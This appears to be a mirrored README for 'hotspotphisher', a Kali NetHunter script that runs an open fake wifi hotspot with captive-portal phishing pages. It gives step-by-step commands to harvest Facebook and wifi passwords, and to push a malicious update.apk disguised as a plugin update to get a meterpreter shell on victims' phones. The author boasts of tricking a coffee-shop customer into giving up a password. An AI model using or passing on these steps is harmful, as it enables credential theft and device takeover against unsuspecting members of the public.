Coder Social home page Coder Social logo

hotspotphisher's Introduction

NB: I made this basic script and tested it on Kali Nethunter.
You don't need a second wireless interface or monitor mode. wlan0 is enough.

1. Scenario 1: facebook phishing

Turn your smart phone's wifi Hotspot on and create an OPEN wireless hotspot (no password).
Open a terminal in kali nethunter and type:
chmod +x hsp.sh && ./hsp.sh
Open a second terminal and type:
ifconfig (check your ip, usually 192.168.43.1)
cd /var/www/html/facebook/ && php -S 192.168.43.1:8080
As soon as you connect to the fake hotspot, a splash screen opens automatically asking for facebook credentials.

2. Scenario 2: fake plugin update with android APK

Create an android payload (update.apk).
Put the update.apk file in "backdoor" folder after you unzip it.
Open a terminal and type:
cd /var/www/html/backdoor/ && php -S 192.168.43.1:8080
Open a second terminal and type ./hsp.sh
When the victim connects to the fake hotspot, he will get a splash screen asking him to download a necessary plugin update (update.apk)
If he installs the apk, you'll get a meterpreter shell.

3. Scenario 3: Wifi Password Pop up

In this scenario, you can name your hotspot the same name as any wifi network around you, and if the victim connects to it by mistake, he's greeted with a pop up login box that asks for the wifi password.
I tried this in a coffee shop and it worked great. Some customers knew the wifi password of the coffee shop but I didn't know it, and one of the customers fell for the trick and gave me the password without knowing it.

ALL SCENARIOS WORK PERFECTLY USING MY NEXUS 5 KALI NETHUNTER.

You can access the logged credentials in the browser. Just type:
http://192.168.43.1:8080/logger.html

The other scenarios: instagram, messenger (etc...) don't need to be explained.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.